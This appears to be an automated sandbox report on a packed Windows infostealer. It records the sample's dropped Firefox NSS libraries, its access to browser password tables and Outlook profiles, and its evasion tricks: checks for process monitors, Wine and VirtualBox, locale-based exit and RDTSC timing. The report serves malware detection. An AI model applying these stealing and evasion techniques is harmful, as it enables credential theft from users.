Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1945827940.000000002990C000.00000004.00000020.00020000.00000000.sdmp, HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5	0_2_00C660D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C730A0	0_2_00C730A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D160A5	0_2_00D160A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2906A	0_2_00C2906A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C782DC	0_2_00C782DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6FAAF	0_2_00C6FAAF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4D224	0_2_00B4D224
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C473FC	0_2_00C473FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B35B19	0_2_00B35B19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C74C9A	0_2_00C74C9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF8C58	0_2_00CF8C58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1C5DE	0_2_00C1C5DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C40EAE	0_2_00C40EAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C67667	0_2_00C67667
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6C61C	0_2_00C6C61C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7162C	0_2_00C7162C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C767F3	0_2_00C767F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFDF29	0_2_00CFDF29

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 008A45C0 appears 316 times

Source: file.exe, 00000000.00000002.2007541642.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2007256263.000000006C865000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: bxaxjwdv ZLIB complexity 0.9948616246604286

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: file.exe, 00000000.00000003.1752059108.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_008B8680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_008B3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\O8HTJN1H.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1859595023.000000001D628000.00000004.00000020.00020000.00000000.sdmp, KKFBAAFCGIEGDHIEBFII.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2006688380.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1852416 > 1048576

Source: file.exe

Static PE information: Raw size of bxaxjwdv is bigger than: 0x100000 < 0x19e200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2007449138.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2007080042.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2007449138.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.8a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;bxaxjwdv:EW;rqgsodtp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;bxaxjwdv:EW;rqgsodtp:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_008B9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1cd193 should be: 0x1c85ce

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: bxaxjwdv
Source: file.exe	Static PE information: section name: rqgsodtp
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6C0C6 push 310F7275h; mov dword ptr [esp], edi	0_2_00D6C0DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 24323CE2h; mov dword ptr [esp], ecx	0_2_00C660F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push ebp; mov dword ptr [esp], eax	0_2_00C66135
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push ebx; mov dword ptr [esp], 29268600h	0_2_00C66258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push esi; mov dword ptr [esp], ebp	0_2_00C66274
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 3B58222Ch; mov dword ptr [esp], eax	0_2_00C662A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 3AC6DF96h; mov dword ptr [esp], ebx	0_2_00C662AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 768005E2h; mov dword ptr [esp], ebp	0_2_00C66323
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 697BED1Fh; mov dword ptr [esp], eax	0_2_00C6633D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push edi; mov dword ptr [esp], ecx	0_2_00C6639C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push esi; mov dword ptr [esp], ecx	0_2_00C66491
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 7937993Ah; mov dword ptr [esp], edx	0_2_00C664A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push edi; mov dword ptr [esp], 436450C1h	0_2_00C6656A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push eax; mov dword ptr [esp], ecx	0_2_00C6657D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push eax; mov dword ptr [esp], 1A4607B6h	0_2_00C665E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push esi; mov dword ptr [esp], 5BEF9112h	0_2_00C665F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push ebp; mov dword ptr [esp], eax	0_2_00C6666E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push edx; mov dword ptr [esp], esi	0_2_00C666B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 722A4F93h; mov dword ptr [esp], ecx	0_2_00C6674B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push edi; mov dword ptr [esp], 2A68462Ah	0_2_00C667BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 5EC3672Fh; mov dword ptr [esp], ebp	0_2_00C667F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 5B346B92h; mov dword ptr [esp], ebp	0_2_00C6681D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push eax; mov dword ptr [esp], 7DF7AC00h	0_2_00C6687C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 47F41449h; mov dword ptr [esp], ebp	0_2_00C668EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 125A0B4Ah; mov dword ptr [esp], edx	0_2_00C66A4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 10039693h; mov dword ptr [esp], edi	0_2_00C66B05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push edx; mov dword ptr [esp], eax	0_2_00C66B2B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push 4392610Ah; mov dword ptr [esp], esi	0_2_00C66B9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push eax; mov dword ptr [esp], edx	0_2_00C66BA3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push ebp; mov dword ptr [esp], esi	0_2_00C66C3B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C660D5 push eax; mov dword ptr [esp], esp	0_2_00C66C3F

Source: file.exe

Static PE information: section name: bxaxjwdv entropy: 7.953604046148972

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_008B9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13298

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7EA90 second address: C7EA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7EA96 second address: C7EAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC714h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D9CA second address: C7D9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D9D0 second address: C7DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3780CDC706h 0x0000000a jmp 00007F3780CDC70Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F3780CDC706h 0x00000018 jmp 00007F3780CDC713h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7DA03 second address: C7DA0D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3780D2BA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7DA0D second address: C7DA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7DBA9 second address: C7DBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7DBAD second address: C7DBC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F3780CDC706h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3780CDC70Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8121F second address: C81224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81224 second address: C8123A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3780CDC708h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8123A second address: C8123E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8123E second address: C8125B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8125B second address: C81277 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3780D2BA6Ch 0x00000008 ja 00007F3780D2BA66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jns 00007F3780D2BA66h 0x0000001b pop edx 0x0000001c rdtsc
